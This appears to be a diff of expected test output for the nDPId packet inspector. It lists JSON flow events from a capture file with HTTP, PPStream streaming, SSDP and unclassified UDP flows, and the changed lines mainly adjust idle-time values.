+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7560000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":338,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":124558,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.42.0.158","src_port":22793,"dst_port":7716,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7440000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7560000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1083,"flow_tot_l4_payload_len":10732,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1467353136433,"flow_last_seen":1467353136982,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":34577,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"118.171.15.56","dst_ip":"192.168.115.8","src_port":5544,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": 